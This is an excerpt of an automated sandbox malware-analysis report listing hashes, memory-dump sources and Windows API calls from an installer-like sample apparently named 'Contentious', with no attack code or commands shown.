                                            • Opcode ID: 09c30aecf541583469fe46bb9fd60f66248bc2de21dacda55b5a29e68068dc2d
                                            • Instruction ID: 9b72f87467464627f01f12753d971c90a9f2ade32ce5abff97dfa002d325ef67
                                            • Opcode Fuzzy Hash: 09c30aecf541583469fe46bb9fd60f66248bc2de21dacda55b5a29e68068dc2d
                                            • Instruction Fuzzy Hash: 99C1AFB4E01218CFDB14DFA5C994B9DBBF2AF89305F2080A9D419AB365DB359E81CF10
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e9697e3c7206de6198fbdd2df9a6ada98057bed57ac928de3695cc12393802b
                                            • Instruction ID: 01014ebffe3c399da8ca452191f783ec6e9b406e9c7bbc57e8033dd057538637
                                            • Opcode Fuzzy Hash: 6e9697e3c7206de6198fbdd2df9a6ada98057bed57ac928de3695cc12393802b
                                            • Instruction Fuzzy Hash: C9C1A0B4E01218CFDB14DFA5C994B9DBBF2AF89305F2080A9D419AB365DB355E81CF50
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa56e27a7d18036e85f8b1c3365be2797703587e818abbaf3abf7312d9e37cfe
                                            • Instruction ID: 91b4e4a6ae7e2b4a89b5a7bcafaeb6f2d40f5102d7fede4f86a575e78fc13416
                                            • Opcode Fuzzy Hash: aa56e27a7d18036e85f8b1c3365be2797703587e818abbaf3abf7312d9e37cfe
                                            • Instruction Fuzzy Hash: BBC1A0B4E00218CFDB14DFA5C994B9DBBF2AF89305F2080A9D419AB365DB359E85CF50
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 89464eede60945abca3526415081c83231beb22777e360edf8214fee9cd75e8c
                                            • Instruction ID: 694209959c61496fe4d94fddb555f51e843b42f780bc788c4af41003f306e2f3
                                            • Opcode Fuzzy Hash: 89464eede60945abca3526415081c83231beb22777e360edf8214fee9cd75e8c
                                            • Instruction Fuzzy Hash: 39C1A0B4E00218CFDB14DFA5C994B9DBBF2AF89305F2081A9D419AB365DB359E81CF50
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a77f7d75be21952537e5b104ffe022ac81ec9e960be7fd20021cc7e31bb6bf2
                                            • Instruction ID: 08f6d0495f30f33d481a0683ec15ca9e331dc121c4ae6fa0a0a8d506c4ccd78d
                                            • Opcode Fuzzy Hash: 5a77f7d75be21952537e5b104ffe022ac81ec9e960be7fd20021cc7e31bb6bf2
                                            • Instruction Fuzzy Hash: FEC1AFB4E00218CFDB14DFA5C994B9DBBF2AF89305F2080A9D419AB365DB359E85CF10
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 77402173b3e2dfe9f934e9dc17685536a1c99470237485c6f12baefca6e6bcea
                                            • Instruction ID: c1e80e9dd144b1e59ff2ba576d47f5bef9192df466b27d252f5bd0c0ea7e883e
                                            • Opcode Fuzzy Hash: 77402173b3e2dfe9f934e9dc17685536a1c99470237485c6f12baefca6e6bcea
                                            • Instruction Fuzzy Hash: ACC1B0B4E00218CFDB54DFA5C994B9DBBF2AF89305F2080A9D819AB365DB355E85CF10
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a6879c0fafac184c3772fd9d95a987f21c9cf2b82ecb5571d8a35866a3e69c15
                                            • Instruction ID: b964b38d46d5d0f6a36e9af60b521d8ec9ee054f9204dbb2ed81f259eadd8933
                                            • Opcode Fuzzy Hash: a6879c0fafac184c3772fd9d95a987f21c9cf2b82ecb5571d8a35866a3e69c15
                                            • Instruction Fuzzy Hash: 8BC1A1B4E00218CFDB14DFA5C994B9DBBF2AF89305F2081A9D419AB365DB355E85CF10
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 37585c0f77568169c7907841b512b751d7a8bc1bca57110999946fc9d515a11e
                                            • Instruction ID: 2c1f4805b14c92535682cc9666b19c1fed61b2ca4eb489f29aac7293f2934852
                                            • Opcode Fuzzy Hash: 37585c0f77568169c7907841b512b751d7a8bc1bca57110999946fc9d515a11e
                                            • Instruction Fuzzy Hash: 53C1AFB4E01218CFDB14DFA5C994B9DBBF2AF89305F2080A9D419AB365DB359E85CF10
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2418ad906f0501673db8c30617038e124a72e4fc51255a1d77c6692ab0a047b5
                                            • Instruction ID: 59a0eb9e1992013d37b13d8fcfb4520cec73d953016cfe9a5d31e54bbad1d769
                                            • Opcode Fuzzy Hash: 2418ad906f0501673db8c30617038e124a72e4fc51255a1d77c6692ab0a047b5
                                            • Instruction Fuzzy Hash: 98C1AE74E01258CFDB14DFA5C994B9DBBF2AF89305F2080A9D809AB365DB359E81CF10
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 326a9a00dd1f23d7c90126dbbed5a5e3d9e49b94b73b33f9bd5d25581bdd85fe
                                            • Instruction ID: ca32ae4fc40080b7e7951cb102671f2fff7fb38b777fccb03bce9623f710933c
                                            • Opcode Fuzzy Hash: 326a9a00dd1f23d7c90126dbbed5a5e3d9e49b94b73b33f9bd5d25581bdd85fe
                                            • Instruction Fuzzy Hash: 39C1A174E00258CFDB54DFA5C994B9DBBF2AF89305F6080A9E809AB365DB355E81CF10
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 67a92b7585fbd0b77e9800469de834cfd696f6f9973108dce296a55373fb7635
                                            • Instruction ID: 9c75dec83c64f2385c073d50b2dea25cc677ce9046d7fca58389987ccbd48a3b
                                            • Opcode Fuzzy Hash: 67a92b7585fbd0b77e9800469de834cfd696f6f9973108dce296a55373fb7635
                                            • Instruction Fuzzy Hash: 0FC19E74E00218CFDB54DFA5C994B9DBBF2AF89305F2080A9D809AB365DB359E81CF50
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 093e1bb89faa9388888ca6e0b6b24c8c26784d8cac349e105579845aa8de1130
                                            • Instruction ID: de5eabe5cdfef2af81a57a3d7aa62f5fff10f6b033858b69c29caa79c4abb043
                                            • Opcode Fuzzy Hash: 093e1bb89faa9388888ca6e0b6b24c8c26784d8cac349e105579845aa8de1130
                                            • Instruction Fuzzy Hash: 9AC19D74E00258CFDB14DFA5C994B9DBBB2AF89305F2080A9D809AB365DB359E85CF50
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 06dd9c9ed37f2e14c2fc8aaff1a2c7c849dd10a5c1a7e248514dd14f9ae57b8e
                                            • Instruction ID: 7b52fc61270f85a3f8320c67cd3912c11b0421c1332686e8326ee25ca71a82e2
                                            • Opcode Fuzzy Hash: 06dd9c9ed37f2e14c2fc8aaff1a2c7c849dd10a5c1a7e248514dd14f9ae57b8e
                                            • Instruction Fuzzy Hash: EBC1AE74E00218CFDB14DFA5C994B9DBBF2AF89305F2080A9D809AB365DB359E81CF10
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 83ceb5391726d2c4fe2f1dfebd61c776d69f8f2b5e29cc0e1713e29fa7209c2e
                                            • Instruction ID: bf20f5e6beb90ea68792515ea4c436fd32fe95f048d8c7a5b3fae72aa1ab16d3
                                            • Opcode Fuzzy Hash: 83ceb5391726d2c4fe2f1dfebd61c776d69f8f2b5e29cc0e1713e29fa7209c2e
                                            • Instruction Fuzzy Hash: C7C1AE74E00258CFDB54DFA5C994B9DBBF2AF89305F2080A9D809AB365DB359E85CF10
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b1811f076b87d8ee8515960f22d6a5c75b104ec606f17c73c3b239665a9355c
                                            • Instruction ID: d58156fbc4a559483e6c8b468aaf251fe66b92e26d88e8dc2ab4723c089933fe
                                            • Opcode Fuzzy Hash: 1b1811f076b87d8ee8515960f22d6a5c75b104ec606f17c73c3b239665a9355c
                                            • Instruction Fuzzy Hash: C7C1BE74E00258CFDB14DFA5C994B9DBBF2AF89305F2080A9D809AB365DB359E81CF10
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c94162e7dba3f04046fbd645458d7df4bb7456e8fca02536bfb632b6f0ae4a3e
                                            • Instruction ID: 3a432b85540d37138cd13f2a0acc182f9e2e860f861ce516560b36c96a173dc2
                                            • Opcode Fuzzy Hash: c94162e7dba3f04046fbd645458d7df4bb7456e8fca02536bfb632b6f0ae4a3e
                                            • Instruction Fuzzy Hash: B2C1A174E00258CFDB54DFA5C994B9DBBF2AF89305F2080A9E809AB365DB355E81CF10
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c90751394c4cd51a862f3e1aa78e989c7915d5c0a8a8cb7199c617d303e7c9be
                                            • Instruction ID: 3909746558c445870db5e6a8ac6191f91a4f3350e182632a152b1ec1198dbdbb
                                            • Opcode Fuzzy Hash: c90751394c4cd51a862f3e1aa78e989c7915d5c0a8a8cb7199c617d303e7c9be
                                            • Instruction Fuzzy Hash: 25C1AE74E00218CFDB54DFA5C994B9DBBF2AF89305F2080A9D809AB365DB359E85CF10
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: de4f6e4451cdc7d89dfee935f94ff42aa74427281498635610dff5f310bc6308
                                            • Instruction ID: 74c3e5263163e1a9fd42761e2ca0a264e5288f8c731067280c322f36784f7ea8
                                            • Opcode Fuzzy Hash: de4f6e4451cdc7d89dfee935f94ff42aa74427281498635610dff5f310bc6308
                                            • Instruction Fuzzy Hash: 68C1AFB4E00218CFDB14DFA5C994B9DBBF2AF88305F2080A9D809AB365DB355E85CF10
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e0556fa5395bf69853350c6dc1a6051231dd3a5c01ec155b73be59ae09562f33
                                            • Instruction ID: 05319e2baeab8b445fdcf6eb96d39509e20d7e40d21b2d8f1622a14aa09072a7
                                            • Opcode Fuzzy Hash: e0556fa5395bf69853350c6dc1a6051231dd3a5c01ec155b73be59ae09562f33
                                            • Instruction Fuzzy Hash: 7BC1BE74E00218CFDB54DFA5C994B9DBBF2AF88305F2080A9D809AB365DB359E85CF50
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c471497a3ddc0cae6bd112ae04226605fa9f46c6f20edeb08c0abe2ef0074ebb
                                            • Instruction ID: ae9ce10ca2bc7288969a37ba1371b2f090605ebeba1042e20b422b2d9b1e1f51
                                            • Opcode Fuzzy Hash: c471497a3ddc0cae6bd112ae04226605fa9f46c6f20edeb08c0abe2ef0074ebb
                                            • Instruction Fuzzy Hash: 7DC1A074E00218CFDB14DFA5C994B9DBBF2AF89305F2080A9D809AB365DB355E81CF50
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c245da4b3a704768c009bd04067164b4fe3d9ab4c193a7f53c3dd92497e1f170
                                            • Instruction ID: 63ddb4fa861b4917f7cf2e8dd1f0d253b54a37a6971eb8125366af7f66705d06
                                            • Opcode Fuzzy Hash: c245da4b3a704768c009bd04067164b4fe3d9ab4c193a7f53c3dd92497e1f170
                                            • Instruction Fuzzy Hash: 10C1A074E00218CFDB54DFA5C994B9DBBF2AF88305F2080A9E809AB365DB355E81CF10
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fdc524f59735372dae23a02aea96619dee6f5fab35338d63b26c855c2928c6fc
                                            • Instruction ID: b7b284c04f8640cf303d02b8289f810653ef14ea800edb1d4394243673f2519b
                                            • Opcode Fuzzy Hash: fdc524f59735372dae23a02aea96619dee6f5fab35338d63b26c855c2928c6fc
                                            • Instruction Fuzzy Hash: D5C1AE74E00218CFDB14DFA5C994B9DBBF2AF89305F2080A9D819AB365DB359E85CF50
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4634971f076e8ea48846bdb72e0c1ff33d097bf7321421740cc08eee4689de5d
                                            • Instruction ID: 5fe6306af25d30b2aa7a5f2835dcbf0a170e6fd79ebed7256125d66ba23ebb89
                                            • Opcode Fuzzy Hash: 4634971f076e8ea48846bdb72e0c1ff33d097bf7321421740cc08eee4689de5d
                                            • Instruction Fuzzy Hash: 9FB18374E00618CFDB54DFA9C894A9DBBB2BF89301F2081A9D819AB365DB34A941CF40
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 28b540aa9fe92fd47bde5617883759bd6eb0d7afed5300ae0c2a9ac7b3de78aa
                                            • Instruction ID: 9ee5eca821b552e8f219ecd885b84ba3f1555610ba8efa734102424f5fd2f2c6
                                            • Opcode Fuzzy Hash: 28b540aa9fe92fd47bde5617883759bd6eb0d7afed5300ae0c2a9ac7b3de78aa
                                            • Instruction Fuzzy Hash: 22A19E74A01228CFDB65DF24C894B9ABBB2BF49301F1085EAD40DAB250DB719EC5CF41
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 10c9a89e68fa0c1a21411e47fa68906d3e37aa18857851cc6a9fe78f8d6e5b94
                                            • Instruction ID: 87acc2534ac6d77138989f84c3b3bd6e612451d5e4a34cf941da5223fc8ceae6
                                            • Opcode Fuzzy Hash: 10c9a89e68fa0c1a21411e47fa68906d3e37aa18857851cc6a9fe78f8d6e5b94
                                            • Instruction Fuzzy Hash: DE51C475E00648CFDB48CFAAD89499DBBF2BF89300F248169D419AB365DB749942CF04
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4655cbcf7b26d36f3e2ebc5ad87c617c5547dcba7a914cd385d08a1098ff4efc
                                            • Instruction ID: 00fbac14975189c633ab77c27f4af845d49cfefb772df24da49d8072df64aec2
                                            • Opcode Fuzzy Hash: 4655cbcf7b26d36f3e2ebc5ad87c617c5547dcba7a914cd385d08a1098ff4efc
                                            • Instruction Fuzzy Hash: F9517E74A01228CFCB69DF24D894B9AB7B2BF4A301F5085E9D40EA7250DB759EC5CF50
                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 0040525E
                                            • GetDlgItem.USER32(?,000003EE), ref: 0040526D
                                            • GetClientRect.USER32(?,?), ref: 004052AA
                                            • GetSystemMetrics.USER32(00000002), ref: 004052B1
                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004052D2
                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004052E3
                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004052F6
                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405304
                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405317
                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405339
                                            • ShowWindow.USER32(?,00000008), ref: 0040534D
                                            • GetDlgItem.USER32(?,000003EC), ref: 0040536E
                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040537E
                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405397
                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004053A3
                                            • GetDlgItem.USER32(?,000003F8), ref: 0040527C
                                              • Part of subcall function 0040405C: SendMessageW.USER32(00000028,?,00000001,00403E88), ref: 0040406A
                                            • GetDlgItem.USER32(?,000003EC), ref: 004053C0
                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005194,00000000), ref: 004053CE
                                            • CloseHandle.KERNEL32(00000000), ref: 004053D5
                                            • ShowWindow.USER32(00000000), ref: 004053F9
                                            • ShowWindow.USER32(?,00000008), ref: 004053FE
                                            • ShowWindow.USER32(00000008), ref: 00405448
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040547C
                                            • CreatePopupMenu.USER32 ref: 0040548D
                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004054A1
                                            • GetWindowRect.USER32(?,?), ref: 004054C1
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054DA
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405512
                                            • OpenClipboard.USER32(00000000), ref: 00405522
                                            • EmptyClipboard.USER32 ref: 00405528
                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405534
                                            • GlobalLock.KERNEL32(00000000), ref: 0040553E
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405552
                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405572
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040557D
                                            • CloseClipboard.USER32 ref: 00405583
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                            • String ID: {
                                            • API String ID: 590372296-366298937
                                            • Opcode ID: 1501b956c8e834078e8edf25a1dd059a1f0ed5114dda484560ea32a9751d8d4d
                                            • Instruction ID: 1a60e1c93915faf36031e484e8dc4f5f0dc3400a4e98dd575bab4ae93e5693cd
                                            • Opcode Fuzzy Hash: 1501b956c8e834078e8edf25a1dd059a1f0ed5114dda484560ea32a9751d8d4d
                                            • Instruction Fuzzy Hash: 7CB14B71900209FFEB21AF60DD89AAE7B79FB04355F00403AFA05B61A0C7755E52DF69
                                            APIs
                                              • Part of subcall function 00406183: GetModuleHandleA.KERNEL32(?,?,00000020,00403242,00000009), ref: 00406195
                                              • Part of subcall function 00406183: LoadLibraryA.KERNEL32(?,?,00000020,00403242,00000009), ref: 004061A0
                                              • Part of subcall function 00406183: GetProcAddress.KERNEL32(00000000,?), ref: 004061B1
                                            • lstrcatW.KERNEL32(00436000,004226B0), ref: 0040382D
                                            • lstrlenW.KERNEL32(00427160,?,?,?,00427160,00000000,00434800,00436000,004226B0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226B0,00000000,00000002,00436800), ref: 004038AD
                                            • lstrcmpiW.KERNEL32(00427158,.exe,00427160,?,?,?,00427160,00000000,00434800,00436000,004226B0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226B0,00000000), ref: 004038C0
                                            • GetFileAttributesW.KERNEL32(00427160), ref: 004038CB
                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403914
                                              • Part of subcall function 00405D60: wsprintfW.USER32 ref: 00405D6D
                                            • RegisterClassW.USER32(00428160), ref: 00403951
                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403969
                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040399E
                                            • ShowWindow.USER32(00000005,00000000), ref: 004039D4
                                            • LoadLibraryW.KERNEL32(RichEd20), ref: 004039E5
                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 004039F0
                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00428160), ref: 00403A00
                                            • GetClassInfoW.USER32(00000000,RichEdit,00428160), ref: 00403A0D
                                            • RegisterClassW.USER32(00428160), ref: 00403A16
                                            • DialogBoxParamW.USER32(?,00000000,00403B4F,00000000), ref: 00403A35
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$`qB$bqB
                                            • API String ID: 914957316-621007215
                                            • Opcode ID: ca6b2e355dc4881ad1daf5d55a366b8e3881b91f83f632729b95c04c92203596
                                            • Instruction ID: 14839756d10fa0731cf70e8e297f409d05a37e9ae1d242a0fae1affd4733ed22
                                            • Opcode Fuzzy Hash: ca6b2e355dc4881ad1daf5d55a366b8e3881b91f83f632729b95c04c92203596
                                            • Instruction Fuzzy Hash: FA61C771604200BEE320AF669D46F3B3A6CEB84745F40457FF941B62E2D7796D12CA2D
                                            APIs
                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404262
                                            • GetDlgItem.USER32(?,000003E8), ref: 00404276
                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404293
                                            • GetSysColor.USER32(?), ref: 004042A4
                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004042B2
                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004042C0
                                            • lstrlenW.KERNEL32(?), ref: 004042C5
                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004042D2
                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004042E7
                                            • GetDlgItem.USER32(?,0000040A), ref: 00404340
                                            • SendMessageW.USER32(00000000), ref: 00404347
                                            • GetDlgItem.USER32(?,000003E8), ref: 00404372
                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004043B5
                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004043C3
                                            • SetCursor.USER32(00000000), ref: 004043C6
                                            • ShellExecuteW.SHELL32(0000070B,open,`qB,00000000,00000000,00000001), ref: 004043DB
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004043E7
                                            • SetCursor.USER32(00000000), ref: 004043EA
                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404419
                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040442B
                                            Strings
                                            Memory Dump Source
